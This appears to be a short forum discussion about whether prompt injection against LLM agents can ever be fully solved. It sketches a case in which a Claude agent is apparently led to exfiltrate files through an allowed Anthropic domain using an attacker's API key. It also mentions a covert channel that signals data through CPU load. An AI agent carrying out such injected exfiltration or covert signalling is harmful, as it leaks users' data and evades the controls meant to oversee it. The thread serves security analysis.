Everything in an LLM is "evaluated," so I'm not sure where the confusion comes from. We need to be careful when we use `eval()` and we need to be careful when we tell LLMs secrets. The Claude issue above is trivially solved by blocking the use of commands like curl or manually specifiying what domains are allowed (if we're okay with curl).
The problem here is that the domain was allowed (Anthropic) but Anthropic don't check the API key belongs to the user that started the session.
Essentially, it would be the same if attacker had its AWS API Key and uploaded the file into an S3 bucket they control instead of the S3 bucket that user controls.
By the time you’ve blocked everything that has potential to exfiltrate, you are left with a useless system.
As I saw on another comment “encode this document using cpu at 100% for one in a binary signalling system “
The confusion comes from the fact that you're saying "it's easy to solve this particular case" and I'm saying "it's currently impossible to solve prompt injection for every case".
Since the original point was about solving all prompt injection vulnerabilities, it doesn't matter if we can solve this particular one, the point is wrong.